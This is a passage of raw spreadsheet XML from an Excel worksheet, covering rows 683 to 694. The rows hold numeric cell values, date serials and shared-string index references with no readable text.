        <v>71</v>
      </c>
      <c r="AT683" t="s">
        <v>72</v>
      </c>
      <c r="AU683">
        <v>25</v>
      </c>
      <c r="AV683">
        <v>0</v>
      </c>
      <c r="AW683">
        <v>20</v>
      </c>
      <c r="AX683">
        <v>0</v>
      </c>
      <c r="AY683">
        <v>5</v>
      </c>
      <c r="AZ683">
        <v>6</v>
      </c>
      <c r="BA683" t="s">
        <v>16955</v>
      </c>
      <c r="BB683" t="s">
        <v>17255</v>
      </c>
      <c r="BC683" t="s">
        <v>9550</v>
      </c>
      <c r="BD683" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="684" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A684">
        <v>2572</v>
      </c>
      <c r="B684" t="s">
        <v>5382</v>
      </c>
      <c r="C684" t="s">
        <v>129</v>
      </c>
      <c r="D684" t="s">
        <v>5383</v>
      </c>
      <c r="E684" t="s">
        <v>131</v>
      </c>
      <c r="F684" t="s">
        <v>3318</v>
      </c>
      <c r="G684" s="1">
        <v>44018</v>
      </c>
      <c r="H684">
        <v>1585</v>
      </c>
      <c r="I684">
        <v>1585</v>
      </c>
      <c r="J684">
        <v>0</v>
      </c>
      <c r="K684">
        <v>0</v>
      </c>
      <c r="L684">
        <v>0</v>
      </c>
      <c r="M684">
        <v>0</v>
      </c>
      <c r="N684">
        <v>0</v>
      </c>
      <c r="O684">
        <v>0</v>
      </c>
      <c r="P684">
        <v>0</v>
      </c>
      <c r="Q684">
        <v>0</v>
      </c>
      <c r="R684">
        <v>0</v>
      </c>
      <c r="S684">
        <v>0</v>
      </c>
      <c r="T684">
        <v>1</v>
      </c>
      <c r="U684">
        <v>0</v>
      </c>
      <c r="V684">
        <v>0</v>
      </c>
      <c r="W684">
        <v>0</v>
      </c>
      <c r="X684">
        <v>0</v>
      </c>
      <c r="Y684">
        <v>0</v>
      </c>
      <c r="Z684">
        <v>0</v>
      </c>
      <c r="AA684">
        <v>0</v>
      </c>
      <c r="AB684">
        <v>0</v>
      </c>
      <c r="AC684">
        <v>0</v>
      </c>
      <c r="AD684">
        <v>0</v>
      </c>
      <c r="AE684">
        <v>250000</v>
      </c>
      <c r="AF684" t="s">
        <v>5384</v>
      </c>
      <c r="AG684">
        <v>15314</v>
      </c>
      <c r="AH684">
        <v>11</v>
      </c>
      <c r="AJ684">
        <v>273</v>
      </c>
      <c r="AK684" t="s">
        <v>3443</v>
      </c>
      <c r="AL684" t="s">
        <v>3443</v>
      </c>
      <c r="AM684" t="s">
        <v>5385</v>
      </c>
      <c r="AN684" t="s">
        <v>68</v>
      </c>
      <c r="AO684">
        <v>2018</v>
      </c>
      <c r="AP684" t="s">
        <v>5386</v>
      </c>
      <c r="AQ684" t="s">
        <v>5387</v>
      </c>
      <c r="AR684" t="s">
        <v>5388</v>
      </c>
      <c r="AS684" t="s">
        <v>71</v>
      </c>
      <c r="AT684" t="s">
        <v>58</v>
      </c>
      <c r="AU684">
        <v>22</v>
      </c>
      <c r="AV684">
        <v>1</v>
      </c>
      <c r="AW684">
        <v>0</v>
      </c>
      <c r="AX684">
        <v>0</v>
      </c>
      <c r="AY684">
        <v>2</v>
      </c>
      <c r="AZ684">
        <v>3</v>
      </c>
      <c r="BA684" t="s">
        <v>17184</v>
      </c>
      <c r="BB684" t="s">
        <v>15877</v>
      </c>
      <c r="BC684" t="s">
        <v>10310</v>
      </c>
      <c r="BD684">
        <v>0</v>
      </c>
    </row>
    <row r="685" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A685">
        <v>2304</v>
      </c>
      <c r="B685" t="s">
        <v>5389</v>
      </c>
      <c r="C685" t="s">
        <v>157</v>
      </c>
      <c r="D685" t="s">
        <v>5390</v>
      </c>
      <c r="E685" t="s">
        <v>49</v>
      </c>
      <c r="F685" t="s">
        <v>364</v>
      </c>
      <c r="G685" s="1">
        <v>43885</v>
      </c>
      <c r="H685">
        <v>1597</v>
      </c>
      <c r="I685">
        <v>1597</v>
      </c>
      <c r="J685">
        <v>0</v>
      </c>
      <c r="K685">
        <v>0</v>
      </c>
      <c r="L685">
        <v>0</v>
      </c>
      <c r="M685">
        <v>0</v>
      </c>
      <c r="N685">
        <v>0</v>
      </c>
      <c r="O685">
        <v>0</v>
      </c>
      <c r="P685">
        <v>0</v>
      </c>
      <c r="Q685">
        <v>0</v>
      </c>
      <c r="R685">
        <v>0</v>
      </c>
      <c r="S685">
        <v>0</v>
      </c>
      <c r="T685">
        <v>1</v>
      </c>
      <c r="U685">
        <v>0</v>
      </c>
      <c r="V685">
        <v>0</v>
      </c>
      <c r="W685">
        <v>0</v>
      </c>
      <c r="X685">
        <v>0</v>
      </c>
      <c r="Y685">
        <v>0</v>
      </c>
      <c r="Z685">
        <v>0</v>
      </c>
      <c r="AA685">
        <v>0</v>
      </c>
      <c r="AB685">
        <v>0</v>
      </c>
      <c r="AC685">
        <v>0</v>
      </c>
      <c r="AD685">
        <v>0</v>
      </c>
      <c r="AE685">
        <v>70000</v>
      </c>
      <c r="AF685" t="s">
        <v>5391</v>
      </c>
      <c r="AG685">
        <v>60184</v>
      </c>
      <c r="AH685">
        <v>16</v>
      </c>
      <c r="AJ685">
        <v>264</v>
      </c>
      <c r="AK685" t="s">
        <v>211</v>
      </c>
      <c r="AL685" t="s">
        <v>5392</v>
      </c>
      <c r="AM685" t="s">
        <v>5393</v>
      </c>
      <c r="AN685" t="s">
        <v>55</v>
      </c>
      <c r="AO685">
        <v>2019</v>
      </c>
      <c r="AP685" t="s">
        <v>5394</v>
      </c>
      <c r="AQ685" t="s">
        <v>5395</v>
      </c>
      <c r="AR685" t="s">
        <v>5391</v>
      </c>
      <c r="AS685" t="s">
        <v>371</v>
      </c>
      <c r="AT685" t="s">
        <v>58</v>
      </c>
      <c r="AU685">
        <v>1</v>
      </c>
      <c r="AV685">
        <v>0</v>
      </c>
      <c r="AW685">
        <v>6</v>
      </c>
      <c r="AX685">
        <v>0</v>
      </c>
      <c r="AY685">
        <v>1</v>
      </c>
      <c r="AZ685">
        <v>1</v>
      </c>
      <c r="BA685" t="s">
        <v>17124</v>
      </c>
      <c r="BB685" t="s">
        <v>15818</v>
      </c>
      <c r="BC685">
        <v>0</v>
      </c>
      <c r="BD685">
        <v>0</v>
      </c>
    </row>
    <row r="686" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A686">
        <v>2617</v>
      </c>
      <c r="B686" t="s">
        <v>5396</v>
      </c>
      <c r="C686" t="s">
        <v>99</v>
      </c>
      <c r="D686" t="s">
        <v>5397</v>
      </c>
      <c r="E686" t="s">
        <v>142</v>
      </c>
      <c r="F686" t="s">
        <v>2374</v>
      </c>
      <c r="G686" s="1">
        <v>43936</v>
      </c>
      <c r="H686">
        <v>1618</v>
      </c>
      <c r="I686">
        <v>1618</v>
      </c>
      <c r="J686">
        <v>3</v>
      </c>
      <c r="K686">
        <v>0</v>
      </c>
      <c r="L686">
        <v>1</v>
      </c>
      <c r="M686">
        <v>0</v>
      </c>
      <c r="N686">
        <v>0</v>
      </c>
      <c r="O686">
        <v>0</v>
      </c>
      <c r="P686">
        <v>0</v>
      </c>
      <c r="Q686">
        <v>1</v>
      </c>
      <c r="R686">
        <v>0</v>
      </c>
      <c r="S686">
        <v>0</v>
      </c>
      <c r="T686">
        <v>1</v>
      </c>
      <c r="U686">
        <v>300000</v>
      </c>
      <c r="V686">
        <v>0</v>
      </c>
      <c r="W686">
        <v>10000</v>
      </c>
      <c r="X686">
        <v>0</v>
      </c>
      <c r="Y686">
        <v>0</v>
      </c>
      <c r="Z686">
        <v>0</v>
      </c>
      <c r="AA686">
        <v>0</v>
      </c>
      <c r="AB686">
        <v>50</v>
      </c>
      <c r="AC686">
        <v>0</v>
      </c>
      <c r="AD686">
        <v>0</v>
      </c>
      <c r="AE686">
        <v>10000</v>
      </c>
      <c r="AF686" t="s">
        <v>5398</v>
      </c>
      <c r="AG686">
        <v>14450</v>
      </c>
      <c r="AH686">
        <v>12</v>
      </c>
      <c r="AJ686">
        <v>160</v>
      </c>
      <c r="AK686" t="s">
        <v>114</v>
      </c>
      <c r="AL686" t="s">
        <v>115</v>
      </c>
      <c r="AM686" t="s">
        <v>5399</v>
      </c>
      <c r="AN686" t="s">
        <v>55</v>
      </c>
      <c r="AO686">
        <v>2019</v>
      </c>
      <c r="AP686" t="s">
        <v>5400</v>
      </c>
      <c r="AQ686" t="s">
        <v>5401</v>
      </c>
      <c r="AR686" t="s">
        <v>5398</v>
      </c>
      <c r="AS686" t="s">
        <v>71</v>
      </c>
      <c r="AT686" t="s">
        <v>58</v>
      </c>
      <c r="AU686">
        <v>6</v>
      </c>
      <c r="AV686">
        <v>0</v>
      </c>
      <c r="AW686">
        <v>0</v>
      </c>
      <c r="AX686">
        <v>0</v>
      </c>
      <c r="AY686">
        <v>10</v>
      </c>
      <c r="AZ686">
        <v>10</v>
      </c>
      <c r="BA686" t="s">
        <v>17211</v>
      </c>
      <c r="BB686" t="s">
        <v>15880</v>
      </c>
      <c r="BC686" t="s">
        <v>10267</v>
      </c>
      <c r="BD686">
        <v>0</v>
      </c>
    </row>
    <row r="687" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A687">
        <v>2618</v>
      </c>
      <c r="B687" t="s">
        <v>5402</v>
      </c>
      <c r="C687" t="s">
        <v>47</v>
      </c>
      <c r="D687" t="s">
        <v>5403</v>
      </c>
      <c r="E687" t="s">
        <v>142</v>
      </c>
      <c r="F687" t="s">
        <v>5404</v>
      </c>
      <c r="G687" s="1">
        <v>43923</v>
      </c>
      <c r="H687">
        <v>1626</v>
      </c>
      <c r="I687">
        <v>1626</v>
      </c>
      <c r="J687">
        <v>1</v>
      </c>
      <c r="K687">
        <v>0</v>
      </c>
      <c r="L687">
        <v>1</v>
      </c>
      <c r="M687">
        <v>0</v>
      </c>
      <c r="N687">
        <v>0</v>
      </c>
      <c r="O687">
        <v>0</v>
      </c>
      <c r="P687">
        <v>0</v>
      </c>
      <c r="Q687">
        <v>0</v>
      </c>
      <c r="R687">
        <v>0</v>
      </c>
      <c r="S687">
        <v>0</v>
      </c>
      <c r="T687">
        <v>0</v>
      </c>
      <c r="U687">
        <v>50000</v>
      </c>
      <c r="V687">
        <v>0</v>
      </c>
      <c r="W687">
        <v>1000</v>
      </c>
      <c r="X687">
        <v>0</v>
      </c>
      <c r="Y687">
        <v>0</v>
      </c>
      <c r="Z687">
        <v>0</v>
      </c>
      <c r="AA687">
        <v>0</v>
      </c>
      <c r="AB687">
        <v>0</v>
      </c>
      <c r="AC687">
        <v>0</v>
      </c>
      <c r="AD687">
        <v>0</v>
      </c>
      <c r="AE687">
        <v>0</v>
      </c>
      <c r="AF687" t="s">
        <v>5405</v>
      </c>
      <c r="AG687">
        <v>21322</v>
      </c>
      <c r="AH687">
        <v>2</v>
      </c>
      <c r="AJ687">
        <v>50</v>
      </c>
      <c r="AK687" t="s">
        <v>5406</v>
      </c>
      <c r="AL687" t="s">
        <v>5407</v>
      </c>
      <c r="AM687" t="s">
        <v>5408</v>
      </c>
      <c r="AN687" t="s">
        <v>68</v>
      </c>
      <c r="AO687">
        <v>2016</v>
      </c>
      <c r="AP687">
        <v>85261293883</v>
      </c>
      <c r="AQ687" t="s">
        <v>5409</v>
      </c>
      <c r="AR687" t="s">
        <v>5405</v>
      </c>
      <c r="AS687" t="s">
        <v>71</v>
      </c>
      <c r="AT687" t="s">
        <v>58</v>
      </c>
      <c r="AU687">
        <v>360</v>
      </c>
      <c r="AV687">
        <v>0</v>
      </c>
      <c r="AW687">
        <v>5</v>
      </c>
      <c r="AX687">
        <v>10</v>
      </c>
      <c r="AY687">
        <v>0</v>
      </c>
      <c r="AZ687">
        <v>0</v>
      </c>
      <c r="BA687" t="s">
        <v>16798</v>
      </c>
      <c r="BB687" t="s">
        <v>15884</v>
      </c>
      <c r="BC687">
        <v>0</v>
      </c>
      <c r="BD687" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="688" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A688">
        <v>2620</v>
      </c>
      <c r="B688" t="s">
        <v>5410</v>
      </c>
      <c r="C688" t="s">
        <v>47</v>
      </c>
      <c r="D688" t="s">
        <v>5411</v>
      </c>
      <c r="E688" t="s">
        <v>121</v>
      </c>
      <c r="F688" t="s">
        <v>5412</v>
      </c>
      <c r="G688" s="1">
        <v>43942</v>
      </c>
      <c r="H688">
        <v>1634</v>
      </c>
      <c r="I688">
        <v>1634</v>
      </c>
      <c r="J688">
        <v>1</v>
      </c>
      <c r="K688">
        <v>0</v>
      </c>
      <c r="L688">
        <v>0</v>
      </c>
      <c r="M688">
        <v>5</v>
      </c>
      <c r="N688">
        <v>0</v>
      </c>
      <c r="O688">
        <v>0</v>
      </c>
      <c r="P688">
        <v>0</v>
      </c>
      <c r="Q688">
        <v>0</v>
      </c>
      <c r="R688">
        <v>0</v>
      </c>
      <c r="S688">
        <v>0</v>
      </c>
      <c r="T688">
        <v>0</v>
      </c>
      <c r="U688">
        <v>80000</v>
      </c>
      <c r="V688">
        <v>0</v>
      </c>
      <c r="W688">
        <v>0</v>
      </c>
      <c r="X688">
        <v>5000</v>
      </c>
      <c r="Y688">
        <v>0</v>
      </c>
      <c r="Z688">
        <v>0</v>
      </c>
      <c r="AA688">
        <v>0</v>
      </c>
      <c r="AB688">
        <v>0</v>
      </c>
      <c r="AC688">
        <v>0</v>
      </c>
      <c r="AD688">
        <v>0</v>
      </c>
      <c r="AE688">
        <v>0</v>
      </c>
      <c r="AF688" t="s">
        <v>5413</v>
      </c>
      <c r="AG688">
        <v>20856</v>
      </c>
      <c r="AH688">
        <v>2</v>
      </c>
      <c r="AJ688">
        <v>36</v>
      </c>
      <c r="AK688" t="s">
        <v>5061</v>
      </c>
      <c r="AL688" t="s">
        <v>5414</v>
      </c>
      <c r="AM688" t="s">
        <v>5415</v>
      </c>
      <c r="AN688" t="s">
        <v>55</v>
      </c>
      <c r="AO688">
        <v>2016</v>
      </c>
      <c r="AP688" t="s">
        <v>5416</v>
      </c>
      <c r="AQ688" t="s">
        <v>5417</v>
      </c>
      <c r="AR688" t="s">
        <v>5413</v>
      </c>
      <c r="AS688" t="s">
        <v>71</v>
      </c>
      <c r="AT688" t="s">
        <v>58</v>
      </c>
      <c r="AU688">
        <v>26</v>
      </c>
      <c r="AV688">
        <v>1</v>
      </c>
      <c r="AW688">
        <v>4</v>
      </c>
      <c r="AX688">
        <v>10</v>
      </c>
      <c r="AY688">
        <v>14</v>
      </c>
      <c r="AZ688">
        <v>28</v>
      </c>
      <c r="BA688" t="s">
        <v>17217</v>
      </c>
      <c r="BB688" t="s">
        <v>15881</v>
      </c>
      <c r="BC688" t="s">
        <v>9693</v>
      </c>
      <c r="BD688" t="s">
        <v>10269</v>
      </c>
    </row>
    <row r="689" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A689">
        <v>2024</v>
      </c>
      <c r="B689" t="s">
        <v>5418</v>
      </c>
      <c r="C689" t="s">
        <v>157</v>
      </c>
      <c r="D689" t="s">
        <v>5419</v>
      </c>
      <c r="E689" t="s">
        <v>809</v>
      </c>
      <c r="F689" t="s">
        <v>5420</v>
      </c>
      <c r="G689" s="1">
        <v>43962</v>
      </c>
      <c r="H689">
        <v>1645</v>
      </c>
      <c r="I689">
        <v>1645</v>
      </c>
      <c r="J689">
        <v>3</v>
      </c>
      <c r="K689">
        <v>2</v>
      </c>
      <c r="L689">
        <v>1</v>
      </c>
      <c r="M689">
        <v>2</v>
      </c>
      <c r="N689">
        <v>0</v>
      </c>
      <c r="O689">
        <v>0</v>
      </c>
      <c r="P689">
        <v>0</v>
      </c>
      <c r="Q689">
        <v>4</v>
      </c>
      <c r="R689">
        <v>2</v>
      </c>
      <c r="S689">
        <v>0</v>
      </c>
      <c r="T689">
        <v>1</v>
      </c>
      <c r="U689">
        <v>7500</v>
      </c>
      <c r="V689">
        <v>350</v>
      </c>
      <c r="W689">
        <v>4500</v>
      </c>
      <c r="X689">
        <v>0</v>
      </c>
      <c r="Y689">
        <v>0</v>
      </c>
      <c r="Z689">
        <v>0</v>
      </c>
      <c r="AA689">
        <v>0</v>
      </c>
      <c r="AB689">
        <v>120</v>
      </c>
      <c r="AC689">
        <v>1</v>
      </c>
      <c r="AD689">
        <v>0</v>
      </c>
      <c r="AE689">
        <v>30</v>
      </c>
      <c r="AF689" t="s">
        <v>5421</v>
      </c>
      <c r="AG689">
        <v>76301</v>
      </c>
      <c r="AH689">
        <v>16</v>
      </c>
      <c r="AJ689">
        <v>250</v>
      </c>
      <c r="AK689" t="s">
        <v>5422</v>
      </c>
      <c r="AL689" t="s">
        <v>5422</v>
      </c>
      <c r="AM689" t="s">
        <v>5423</v>
      </c>
      <c r="AN689" t="s">
        <v>55</v>
      </c>
      <c r="AO689">
        <v>2016</v>
      </c>
      <c r="AP689">
        <v>85226484242</v>
      </c>
      <c r="AQ689" t="s">
        <v>5424</v>
      </c>
      <c r="AR689" t="s">
        <v>5425</v>
      </c>
      <c r="AS689" t="s">
        <v>71</v>
      </c>
      <c r="AT689" t="s">
        <v>58</v>
      </c>
      <c r="AU689">
        <v>30</v>
      </c>
      <c r="AV689">
        <v>1</v>
      </c>
      <c r="AW689">
        <v>21</v>
      </c>
      <c r="AX689">
        <v>39</v>
      </c>
      <c r="AY689">
        <v>5</v>
      </c>
      <c r="AZ689">
        <v>5</v>
      </c>
      <c r="BA689" t="s">
        <v>17044</v>
      </c>
      <c r="BB689">
        <v>0</v>
      </c>
      <c r="BC689" t="s">
        <v>10275</v>
      </c>
      <c r="BD689" t="s">
        <v>10276</v>
      </c>
    </row>
    <row r="690" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A690">
        <v>2247</v>
      </c>
      <c r="B690" t="s">
        <v>5426</v>
      </c>
      <c r="C690" t="s">
        <v>168</v>
      </c>
      <c r="D690" t="s">
        <v>5427</v>
      </c>
      <c r="E690" t="s">
        <v>111</v>
      </c>
      <c r="F690" t="s">
        <v>2830</v>
      </c>
      <c r="G690" s="1">
        <v>44347</v>
      </c>
      <c r="H690">
        <v>1653</v>
      </c>
      <c r="I690">
        <v>1653</v>
      </c>
      <c r="J690">
        <v>4</v>
      </c>
      <c r="K690">
        <v>0</v>
      </c>
      <c r="L690">
        <v>0</v>
      </c>
      <c r="M690">
        <v>0</v>
      </c>
      <c r="N690">
        <v>0</v>
      </c>
      <c r="O690">
        <v>0</v>
      </c>
      <c r="P690">
        <v>0</v>
      </c>
      <c r="Q690">
        <v>0</v>
      </c>
      <c r="R690">
        <v>0</v>
      </c>
      <c r="S690">
        <v>1</v>
      </c>
      <c r="T690">
        <v>0</v>
      </c>
      <c r="U690">
        <v>3000000</v>
      </c>
      <c r="V690">
        <v>0</v>
      </c>
      <c r="W690">
        <v>0</v>
      </c>
      <c r="X690">
        <v>0</v>
      </c>
      <c r="Y690">
        <v>0</v>
      </c>
      <c r="Z690">
        <v>0</v>
      </c>
      <c r="AA690">
        <v>0</v>
      </c>
      <c r="AB690">
        <v>0</v>
      </c>
      <c r="AC690">
        <v>0</v>
      </c>
      <c r="AD690">
        <v>1</v>
      </c>
      <c r="AE690">
        <v>0</v>
      </c>
      <c r="AF690" t="s">
        <v>5428</v>
      </c>
      <c r="AG690">
        <v>17414</v>
      </c>
      <c r="AH690">
        <v>13</v>
      </c>
      <c r="AJ690">
        <v>183</v>
      </c>
      <c r="AK690" t="s">
        <v>2832</v>
      </c>
      <c r="AL690" t="s">
        <v>2833</v>
      </c>
      <c r="AM690" t="s">
        <v>5429</v>
      </c>
      <c r="AN690" t="s">
        <v>55</v>
      </c>
      <c r="AO690">
        <v>2014</v>
      </c>
      <c r="AP690" t="s">
        <v>5430</v>
      </c>
      <c r="AQ690" t="s">
        <v>5431</v>
      </c>
      <c r="AR690" t="s">
        <v>5428</v>
      </c>
      <c r="AS690" t="s">
        <v>179</v>
      </c>
      <c r="AT690" t="s">
        <v>58</v>
      </c>
      <c r="AU690">
        <v>0</v>
      </c>
      <c r="AV690">
        <v>0</v>
      </c>
      <c r="AW690">
        <v>0</v>
      </c>
      <c r="AX690">
        <v>0</v>
      </c>
      <c r="AY690">
        <v>10</v>
      </c>
      <c r="AZ690">
        <v>10</v>
      </c>
      <c r="BA690" t="s">
        <v>17101</v>
      </c>
      <c r="BB690" t="s">
        <v>15787</v>
      </c>
      <c r="BC690" t="s">
        <v>10267</v>
      </c>
      <c r="BD690">
        <v>0</v>
      </c>
    </row>
    <row r="691" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A691">
        <v>2563</v>
      </c>
      <c r="B691" t="s">
        <v>5432</v>
      </c>
      <c r="C691" t="s">
        <v>458</v>
      </c>
      <c r="D691" t="s">
        <v>5433</v>
      </c>
      <c r="E691" t="s">
        <v>49</v>
      </c>
      <c r="F691" t="s">
        <v>5434</v>
      </c>
      <c r="G691" s="1">
        <v>43913</v>
      </c>
      <c r="H691">
        <v>1661</v>
      </c>
      <c r="I691">
        <v>1661</v>
      </c>
      <c r="J691">
        <v>0</v>
      </c>
      <c r="K691">
        <v>0</v>
      </c>
      <c r="L691">
        <v>0</v>
      </c>
      <c r="M691">
        <v>0</v>
      </c>
      <c r="N691">
        <v>0</v>
      </c>
      <c r="O691">
        <v>0</v>
      </c>
      <c r="P691">
        <v>0</v>
      </c>
      <c r="Q691">
        <v>2</v>
      </c>
      <c r="R691">
        <v>7</v>
      </c>
      <c r="S691">
        <v>0</v>
      </c>
      <c r="T691">
        <v>1</v>
      </c>
      <c r="U691">
        <v>0</v>
      </c>
      <c r="V691">
        <v>0</v>
      </c>
      <c r="W691">
        <v>0</v>
      </c>
      <c r="X691">
        <v>0</v>
      </c>
      <c r="Y691">
        <v>0</v>
      </c>
      <c r="Z691">
        <v>0</v>
      </c>
      <c r="AA691">
        <v>0</v>
      </c>
      <c r="AB691">
        <v>200</v>
      </c>
      <c r="AC691">
        <v>500</v>
      </c>
      <c r="AD691">
        <v>0</v>
      </c>
      <c r="AE691">
        <v>5000</v>
      </c>
      <c r="AF691" t="s">
        <v>5435</v>
      </c>
      <c r="AG691">
        <v>29433</v>
      </c>
      <c r="AH691">
        <v>5</v>
      </c>
      <c r="AJ691">
        <v>153</v>
      </c>
      <c r="AK691" t="s">
        <v>5436</v>
      </c>
      <c r="AL691" t="s">
        <v>5437</v>
      </c>
      <c r="AM691" t="s">
        <v>5438</v>
      </c>
      <c r="AN691" t="s">
        <v>55</v>
      </c>
      <c r="AO691">
        <v>2013</v>
      </c>
      <c r="AP691">
        <v>81261227727</v>
      </c>
      <c r="AQ691" t="s">
        <v>5439</v>
      </c>
      <c r="AR691" t="s">
        <v>5440</v>
      </c>
      <c r="AS691" t="s">
        <v>57</v>
      </c>
      <c r="AT691" t="s">
        <v>58</v>
      </c>
      <c r="AU691">
        <v>0</v>
      </c>
      <c r="AV691">
        <v>0</v>
      </c>
      <c r="AW691">
        <v>0</v>
      </c>
      <c r="AX691">
        <v>0</v>
      </c>
      <c r="AY691">
        <v>9</v>
      </c>
      <c r="AZ691">
        <v>1</v>
      </c>
      <c r="BA691" t="s">
        <v>17177</v>
      </c>
      <c r="BB691">
        <v>0</v>
      </c>
      <c r="BC691" t="s">
        <v>9638</v>
      </c>
      <c r="BD691" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="692" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A692">
        <v>1813</v>
      </c>
      <c r="B692" t="s">
        <v>5441</v>
      </c>
      <c r="C692" t="s">
        <v>129</v>
      </c>
      <c r="D692" t="s">
        <v>5442</v>
      </c>
      <c r="E692" t="s">
        <v>142</v>
      </c>
      <c r="F692" t="s">
        <v>5443</v>
      </c>
      <c r="G692" s="1">
        <v>43977</v>
      </c>
      <c r="H692">
        <v>1672</v>
      </c>
      <c r="I692">
        <v>1672</v>
      </c>
      <c r="J692">
        <v>1</v>
      </c>
      <c r="K692">
        <v>1</v>
      </c>
      <c r="L692">
        <v>1</v>
      </c>
      <c r="M692">
        <v>1</v>
      </c>
      <c r="N692">
        <v>1000</v>
      </c>
      <c r="O692">
        <v>1</v>
      </c>
      <c r="P692">
        <v>1</v>
      </c>
      <c r="Q692">
        <v>1</v>
      </c>
      <c r="R692">
        <v>14</v>
      </c>
      <c r="S692">
        <v>1</v>
      </c>
      <c r="T692">
        <v>0</v>
      </c>
      <c r="U692">
        <v>3000</v>
      </c>
      <c r="V692">
        <v>3000</v>
      </c>
      <c r="W692">
        <v>1000</v>
      </c>
      <c r="X692">
        <v>1000</v>
      </c>
      <c r="Y692">
        <v>0</v>
      </c>
      <c r="Z692">
        <v>1000</v>
      </c>
      <c r="AA692">
        <v>1000</v>
      </c>
      <c r="AB692">
        <v>200</v>
      </c>
      <c r="AC692">
        <v>3000</v>
      </c>
      <c r="AD692">
        <v>1000</v>
      </c>
      <c r="AE692">
        <v>0</v>
      </c>
      <c r="AF692" t="s">
        <v>5444</v>
      </c>
      <c r="AG692">
        <v>15211</v>
      </c>
      <c r="AH692">
        <v>11</v>
      </c>
      <c r="AJ692">
        <v>268</v>
      </c>
      <c r="AK692" t="s">
        <v>252</v>
      </c>
      <c r="AL692" t="s">
        <v>174</v>
      </c>
      <c r="AM692" t="s">
        <v>5445</v>
      </c>
      <c r="AN692" t="s">
        <v>55</v>
      </c>
      <c r="AO692">
        <v>2017</v>
      </c>
      <c r="AP692" t="s">
        <v>5446</v>
      </c>
      <c r="AQ692" t="s">
        <v>5447</v>
      </c>
      <c r="AR692" t="s">
        <v>5448</v>
      </c>
      <c r="AU692">
        <v>30</v>
      </c>
      <c r="AV692">
        <v>3</v>
      </c>
      <c r="AW692">
        <v>0</v>
      </c>
      <c r="AX692">
        <v>0</v>
      </c>
      <c r="AY692">
        <v>40</v>
      </c>
      <c r="AZ692">
        <v>42</v>
      </c>
      <c r="BA692" t="s">
        <v>17004</v>
      </c>
      <c r="BB692" t="s">
        <v>15531</v>
      </c>
      <c r="BC692" t="s">
        <v>9660</v>
      </c>
      <c r="BD692" t="s">
        <v>10280</v>
      </c>
    </row>
    <row r="693" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A693">
        <v>2633</v>
      </c>
      <c r="B693" t="s">
        <v>5449</v>
      </c>
      <c r="C693" t="s">
        <v>318</v>
      </c>
      <c r="D693" t="s">
        <v>5450</v>
      </c>
      <c r="E693" t="s">
        <v>363</v>
      </c>
      <c r="F693" t="s">
        <v>364</v>
      </c>
      <c r="G693" s="1">
        <v>43994</v>
      </c>
      <c r="H693">
        <v>1682</v>
      </c>
      <c r="I693">
        <v>1682</v>
      </c>
      <c r="J693">
        <v>0</v>
      </c>
      <c r="K693">
        <v>0</v>
      </c>
      <c r="L693">
        <v>0</v>
      </c>
      <c r="M693">
        <v>0</v>
      </c>
      <c r="N693">
        <v>0</v>
      </c>
      <c r="O693">
        <v>0</v>
      </c>
      <c r="P693">
        <v>0</v>
      </c>
      <c r="Q693">
        <v>0</v>
      </c>
      <c r="R693">
        <v>0</v>
      </c>
      <c r="S693">
        <v>0</v>
      </c>
      <c r="T693">
        <v>1</v>
      </c>
      <c r="U693">
        <v>0</v>
      </c>
      <c r="V693">
        <v>0</v>
      </c>
      <c r="W693">
        <v>0</v>
      </c>
      <c r="X693">
        <v>0</v>
      </c>
      <c r="Y693">
        <v>0</v>
      </c>
      <c r="Z693">
        <v>0</v>
      </c>
      <c r="AA693">
        <v>0</v>
      </c>
      <c r="AB693">
        <v>0</v>
      </c>
      <c r="AC693">
        <v>0</v>
      </c>
      <c r="AD693">
        <v>0</v>
      </c>
      <c r="AE693">
        <v>100</v>
      </c>
      <c r="AF693" t="s">
        <v>5451</v>
      </c>
      <c r="AG693">
        <v>90551</v>
      </c>
      <c r="AH693">
        <v>26</v>
      </c>
      <c r="AJ693">
        <v>406</v>
      </c>
      <c r="AK693" t="s">
        <v>647</v>
      </c>
      <c r="AL693" t="s">
        <v>3743</v>
      </c>
      <c r="AM693" t="s">
        <v>5452</v>
      </c>
      <c r="AN693" t="s">
        <v>68</v>
      </c>
      <c r="AO693">
        <v>2020</v>
      </c>
      <c r="AP693">
        <v>85256000063</v>
      </c>
      <c r="AQ693">
        <v>85256000063</v>
      </c>
      <c r="AR693" t="s">
        <v>5451</v>
      </c>
      <c r="AU693">
        <v>24</v>
      </c>
      <c r="AV693">
        <v>2</v>
      </c>
      <c r="AW693">
        <v>5</v>
      </c>
      <c r="AX693">
        <v>0</v>
      </c>
      <c r="AY693">
        <v>5</v>
      </c>
      <c r="AZ693">
        <v>1</v>
      </c>
      <c r="BA693" t="s">
        <v>17227</v>
      </c>
      <c r="BB693" t="s">
        <v>17235</v>
      </c>
      <c r="BC693">
        <v>0</v>
      </c>
      <c r="BD693" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="694" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A694">
        <v>2629</v>
      </c>
      <c r="B694" t="s">
        <v>5453</v>
      </c>
      <c r="C694" t="s">
        <v>199</v>
      </c>
      <c r="D694" t="s">
        <v>5454</v>
      </c>
      <c r="E694" t="s">
        <v>1245</v>
      </c>
      <c r="F694" t="s">
        <v>5455</v>
      </c>
      <c r="G694" s="1">
        <v>43888</v>
      </c>
      <c r="H694">
        <v>1713</v>
      </c>
      <c r="I694">
        <v>1713</v>
      </c>
      <c r="J694">
        <v>0</v>
      </c>
      <c r="K694">
        <v>1</v>
      </c>
      <c r="L694">
        <v>0</v>
      </c>
      <c r="M694">
        <v>0</v>
      </c>
      <c r="N694">
        <v>0</v>
      </c>
      <c r="O694">
        <v>0</v>
      </c>
      <c r="P694">
        <v>0</v>
      </c>
      <c r="Q694">
        <v>2</v>
      </c>
      <c r="R694">
        <v>1</v>
      </c>
      <c r="S694">
